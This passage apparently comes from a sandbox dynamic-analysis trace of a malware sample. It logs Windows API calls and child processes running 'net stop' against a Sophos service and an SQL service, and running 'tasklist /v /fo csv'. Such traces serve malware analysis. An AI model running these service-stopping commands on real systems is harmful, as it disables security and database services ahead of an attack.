STAR", _MaxCount=0x8) returned 14 [0050.176] LocalFree (hMem=0x699638) returned 0x0 [0050.176] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x14 [0050.176] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0050.176] LocalFree (hMem=0x699638) returned 0x0 [0050.176] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x15 [0050.176] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0050.176] LocalFree (hMem=0x699638) returned 0x0 [0050.176] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x15 [0050.176] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0050.176] LocalFree (hMem=0x699638) returned 0x0 [0050.176] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x16 [0050.176] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0050.176] LocalFree (hMem=0x699638) returned 0x0 [0050.176] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="䵀i⡋瓢/阸i/") returned 0x11 [0050.176] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0050.176] LocalFree (hMem=0x694d40) returned 0x0 [0050.176] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="똸i⡋瓢/䵀i/") returned 0x14 [0050.176] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0050.176] LocalFree (hMem=0x69b638) returned 0x0 [0050.176] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="똸i⡋瓢/똸i/") returned 0x12 [0050.176] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0050.176] LocalFree (hMem=0x69b638) returned 0x0 [0050.176] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="똸i⡋瓢/똸i/") returned 0xf [0050.176] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0050.176] LocalFree (hMem=0x69b638) returned 0x0 [0050.176] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="똸i⡋瓢/똸i/") returned 0x17 [0050.176] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0050.176] LocalFree (hMem=0x69b638) returned 0x0 [0050.177] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="똸i⡋瓢/똸i/") returned 0x18 [0050.177] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0050.177] LocalFree (hMem=0x69b638) returned 0x0 [0050.177] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="똸i⡋瓢/똸i/") returned 0x2a [0050.177] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0050.177] LocalFree (hMem=0x69b638) returned 0x0 [0050.177] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="똸i⡋瓢/똸i/") returned 0x15 [0050.177] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0050.177] GetFileType (hFile=0x26c) returned 0x3 [0050.177] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x2ff824 | out: lpMode=0x2ff824) returned 0 [0050.184] GetConsoleOutputCP () returned 0x1b5 [0050.184] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0050.184] malloc (_Size=0x16) returned 0x932728 [0050.184] GetConsoleOutputCP () returned 0x1b5 [0050.184] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x932728, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0050.184] WriteFile (in: hFile=0x26c, lpBuffer=0x932728*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x2ff828, lpOverlapped=0x0 | out: lpBuffer=0x932728*, lpNumberOfBytesWritten=0x2ff828*=0x15, lpOverlapped=0x0) returned 1 [0050.184] free (_Block=0x932728) [0050.184] LocalFree (hMem=0x69b638) returned 0x0 [0050.184] NetApiBufferFree (Buffer=0x691c98) returned 0x0 [0050.185] NetApiBufferFree (Buffer=0x691cb0) returned 0x0 [0050.185] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Message RouterΓÇ¥ /y" [0050.185] exit (_Code=1) Process: id = "113" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x44ceb000" os_pid = "0xa64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQLFDLauncher$SBSMONITORING /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 228 os_tid = 0xa68 Process: id = "114" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x46626000" os_pid = "0xa60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "113" os_parent_pid = "0xa64" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SBSMONITORING /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 229 os_tid = 0xa58 [0050.362] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fd04 | out: lpSystemTimeAsFileTime=0x19fd04*(dwLowDateTime=0xe75c16a0, dwHighDateTime=0x1d57a86)) [0050.362] GetCurrentProcessId () returned 0xa60 [0050.362] GetCurrentThreadId () returned 0xa58 [0050.362] GetTickCount () returned 0x11472d0 [0050.362] QueryPerformanceCounter (in: lpPerformanceCount=0x19fcfc | out: lpPerformanceCount=0x19fcfc*=17064717323) returned 1 [0050.363] GetModuleHandleA (lpModuleName=0x0) returned 0xc20000 [0050.363] __set_app_type (_Type=0x1) [0050.363] __p__fmode () returned 0x74eb31f4 [0050.363] __p__commode () returned 0x74eb31fc [0050.363] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc2ffe6) returned 0x0 [0050.363] __getmainargs (in: _Argc=0xc39064, _Argv=0xc3906c, _Env=0xc39068, _DoWildCard=0, _StartInfo=0xc39024 | out: _Argc=0xc39064, _Argv=0xc3906c, _Env=0xc39068) returned 0 [0050.363] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0050.363] GetConsoleOutputCP () returned 0x1b5 [0050.363] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc39080 | out: lpCPInfo=0xc39080) returned 1 [0050.363] SetThreadUILanguage (LangId=0x0) returned 0x409 [0050.367] sprintf_s (in: _DstBuf=0x19fcbc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0050.367] setlocale (category=0, locale=".437") returned="English_United States.437" [0050.369] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0050.369] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0050.369] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SBSMONITORING /y" [0050.369] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fa88, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0050.369] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x8e) returned 0x4e4c00 [0050.369] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0050.369] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x19fc8c | out: Buffer=0x19fc8c*=0x4e1c98) returned 0x0 [0050.369] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x19fc8c | out: Buffer=0x19fc8c*=0x4e1cb0) returned 0x0 [0050.369] _fileno (_File=0x74eb2900) returned -2 [0050.369] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0050.370] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0050.370] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0050.370] _wcsicmp (_String1="config", _String2="stop") returned -16 [0050.370] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0050.370] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0050.370] _wcsicmp (_String1="file", _String2="stop") returned -13 [0050.370] _wcsicmp (_String1="files", _String2="stop") returned -13 [0050.370] _wcsicmp (_String1="group", _String2="stop") returned -12 [0050.370] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0050.370] _wcsicmp (_String1="help", _String2="stop") returned -11 [0050.370] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0050.370] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0050.370] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0050.370] _wcsicmp (_String1="session", _String2="stop") returned -15 [0050.370] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0050.370] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0050.370] _wcsicmp (_String1="share", _String2="stop") returned -12 [0050.370] _wcsicmp (_String1="start", _String2="stop") returned -14 [0050.370] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0050.370] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0050.370] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0050.370] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$SBSMONITORING") returned -12 [0050.370] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$SBSMONITORING") returned -10 [0050.370] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$SBSMONITORING") returned -10 [0050.370] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$SBSMONITORING") returned -10 [0050.370] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$SBSMONITORING") returned -10 [0050.370] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$SBSMONITORING") returned -7 [0050.370] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$SBSMONITORING") returned -7 [0050.370] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$SBSMONITORING") returned -6 [0050.370] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$SBSMONITORING") returned -6 [0050.370] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$SBSMONITORING") returned -5 [0050.370] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$SBSMONITORING") returned -5 [0050.370] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$SBSMONITORING") returned -1 [0050.370] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$SBSMONITORING") returned 3 [0050.370] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0050.370] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0050.370] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0050.370] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0050.370] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0050.371] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0050.371] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0050.371] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0050.371] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$SBSMONITORING") returned 7 [0050.371] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$SBSMONITORING") returned 8 [0050.371] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$SBSMONITORING") returned 8 [0050.371] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$SBSMONITORING") returned -12 [0050.371] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$SBSMONITORING") returned -14 [0050.371] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$SBSMONITORING") returned 5 [0050.371] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$SBSMONITORING") returned 5 [0050.371] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$SBSMONITORING") returned 1 [0050.371] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$SBSMONITORING") returned 5 [0050.371] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$SBSMONITORING") returned 5 [0050.371] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$SBSMONITORING") returned 5 [0050.371] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$SBSMONITORING") returned 10 [0050.371] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$SBSMONITORING") returned 10 [0050.371] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$SBSMONITORING") returned 10 [0050.371] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$SBSMONITORING") returned 3 [0050.371] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$SBSMONITORING") returned -9 [0050.371] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$SBSMONITORING") returned -1 [0050.371] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0050.371] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0050.371] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0050.371] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$SBSMONITORING") returned -1 [0050.371] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$SBSMONITORING") returned -12 [0050.371] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$SBSMONITORING") returned 1 [0050.371] _wcsupr (in: _String="MSSQLFDLauncher$SBSMONITORING" | out: _String="MSSQLFDLAUNCHER$SBSMONITORING") returned="MSSQLFDLAUNCHER$SBSMONITORING" [0050.371] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4e54e0 [0050.374] GetServiceKeyNameW (in: hSCManager=0x4e54e0, lpDisplayName="MSSQLFDLAUNCHER$SBSMONITORING", lpServiceName=0xc3aaf0, lpcchBuffer=0x19fc28 | out: lpServiceName="", lpcchBuffer=0x19fc28) returned 0 [0050.374] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -12 [0050.374] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -14 [0050.374] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 5 [0050.374] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 5 [0050.374] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 5 [0050.374] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 5 [0050.375] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 5 [0050.375] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 10 [0050.375] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 10 [0050.375] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 10 [0050.375] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 3 [0050.375] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -9 [0050.375] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -1 [0050.375] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 6 [0050.375] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 6 [0050.375] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 6 [0050.375] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -1 [0050.375] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -12 [0050.375] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 1 [0050.375] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$SBSMONITORING", opcode=0x0, arg=0x0, bufptr=0x19fc24 | out: bufptr=0x19fc24) returned 0x889 [0050.376] wcscpy_s (in: _Destination=0xc3a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0050.376] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73c40000 [0050.378] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73c40000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xc3b338, nSize=0x800, Arguments=0xc39dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0050.379] GetFileType (hFile=0x26c) returned 0x3 [0050.379] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4e3ca8 [0050.379] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4e3ca8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0050.379] WriteFile (in: hFile=0x26c, lpBuffer=0x4e3ca8*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x19fb64, lpOverlapped=0x0 | out: lpBuffer=0x4e3ca8*, lpNumberOfBytesWritten=0x19fb64*=0x1e, lpOverlapped=0x0) returned 1 [0196.117] LocalFree (hMem=0x4e3ca8) returned 0x0 [0196.117] GetFileType (hFile=0x26c) returned 0x3 [0196.117] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4e62a8 [0196.117] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4e62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nN", lpUsedDefaultChar=0x0) returned 2 [0196.117] WriteFile (in: hFile=0x26c, lpBuffer=0x4e62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19fb64, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x19fb64, lpOverlapped=0x0) returned 0 [0196.118] LocalFree (hMem=0x4e62a8) returned 0x0 [0196.118] _ultow (in: _Dest=0x889, _Radix=1702804 | out: _Dest=0x889) returned="2185" [0196.118] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73c40000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xc3b338, nSize=0x800, Arguments=0xc39dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0196.118] GetFileType (hFile=0x26c) returned 0x3 [0196.118] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4e62a8 [0196.118] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4e62a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0196.118] WriteFile (in: hFile=0x26c, lpBuffer=0x4e62a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x19fb70, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x19fb70, lpOverlapped=0x0) returned 0 [0196.118] LocalFree (hMem=0x4e62a8) returned 0x0 [0196.118] GetFileType (hFile=0x26c) returned 0x3 [0196.118] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4e62a8 [0196.119] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4e62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nN", lpUsedDefaultChar=0x0) returned 2 [0196.119] WriteFile (in: hFile=0x26c, lpBuffer=0x4e62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19fb70, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x19fb70, lpOverlapped=0x0) returned 0 [0196.119] LocalFree (hMem=0x4e62a8) returned 0x0 [0196.119] NetApiBufferFree (Buffer=0x4e1c98) returned 0x0 [0196.120] NetApiBufferFree (Buffer=0x4e1cb0) returned 0x0 [0196.120] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SBSMONITORING /y" [0196.120] exit (_Code=2) Process: id = "115" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x45b14000" os_pid = "0xa38" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "108" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0007fa60" [0xc000000f] Thread: id = 230 os_tid = 0xa78 Thread: id = 231 os_tid = 0xa84 Thread: id = 232 os_tid = 0xa80 Thread: id = 233 os_tid = 0xa88 Thread: id = 234 os_tid = 0xa54 Thread: id = 235 os_tid = 0xa5c Thread: id = 236 os_tid = 0xa6c Thread: id = 237 os_tid = 0xa7c Thread: id = 238 os_tid = 0xa74 Thread: id = 245 os_tid = 0xa8c Process: id = "116" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x79c84000" os_pid = "0xb94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x8dc" cmd_line = "\"tasklist\" /v /fo csv" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 252 os_tid = 0xbb0 Thread: id = 253 os_tid = 0x5cc Thread: id = 254 os_tid = 0xbb4 Thread: id = 255 os_tid = 0xbd0 Thread: id = 256 os_tid = 0xbc8 Process: id = "117" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x15e22000" os_pid = "0xbe4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "108" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000a2591" [0xc000000f] Thread: id = 264 os_tid = 0x56c Thread: id = 265 os_tid = 0x534 Thread: id = 266 os_tid = 0x320 Thread: id = 267 os_tid = 0x80c Thread: id = 268 os_tid = 0x810 Thread: id = 269 os_tid = 0xbf4 Thread: id = 270 os_tid = 0x804 Thread: id = 273 os_tid = 0x3c0 Thread: id = 274 os_tid = 0x7bc Thread: id = 531 os_tid = 0x508 Thread: id = 596 os_tid = 0x868 Thread: id = 597 os_tid = 0x784 Process: id = "118" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x25f7d000" os_pid = "0x1e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x8dc" cmd_line = "\"tasklist\" /v /fo csv" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 276 os_tid = 0x2ac Thread: id = 277 os_tid = 0x6ac Thread: id = 278 os_tid = 0x7ac Thread: id = 279 os_tid = 0x358 Thread: id = 280 os_tid = 0x7d4 Process: id = "119" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x54133000" os_pid = "0xc4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "108" os_parent_pid = "0x36c" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness 